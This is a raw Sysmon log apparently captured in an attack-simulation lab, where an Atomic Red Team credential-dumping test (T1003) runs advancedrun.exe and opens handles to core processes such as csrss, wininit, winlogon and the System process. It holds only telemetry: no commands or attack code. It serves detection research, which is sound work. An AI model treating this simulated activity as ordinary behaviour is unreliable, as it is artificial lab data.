bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003942695Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942694Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB07-61EA-8800-000000002702}4836C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942692Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942691Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942690Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942689Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003942688Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942687Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942686Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942685Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000003942684Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\AdvancedRun.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 10341000x80000000000000003942683Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942682Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942681Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942680Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942679Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942678Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:19:16.984{834264DD-EB14-61EA-2003-000000002702}19685632C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942677Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 